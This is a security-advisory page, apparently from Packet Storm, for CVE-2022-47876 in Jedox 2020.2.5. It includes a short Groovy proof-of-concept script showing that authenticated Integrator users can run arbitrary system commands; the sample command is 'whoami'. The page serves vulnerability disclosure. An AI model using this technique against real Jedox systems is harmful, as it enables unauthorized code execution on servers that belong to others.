Lucene search
Christoph Mahrl, Patrick Pirker, Michael Wedl, Aron MolnarPACKETSTORM:172155HistoryMay 05, 2023 - 12:00 a.m.
Jedox 2020.2.5 Groovy-Scripts Remote Code Execution
2023-05-0500:00:00
Christoph Mahrl, Patrick Pirker, Michael Wedl, Aron Molnar
packetstormsecurity.com
174
jedox 2020.2.5
groovy-scripts
remote code execution
integrator
vulnerability
authenticated users
0.046 Low
EPSS
Percentile
92.6%
`# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
# Date: 28/04/2023
# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47876
Introduction
=================
Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:
def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(10000)
LOG.error(sout.toString());
LOG.error(serr.toString());
`
Related
cve
cve
CVE-2022-47876
2023-05-02 20:15:10
cvelist
cvelist
CVE-2022-47876
2023-05-02 00:00:00
prion
prion
Design/Logic Flaw
2023-05-02 20:15:00
nvd
nvd
CVE-2022-47876
2023-05-02 20:15:10
zdt
zdt
exploitdb
exploitdb
Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
2023-05-05 00:00:00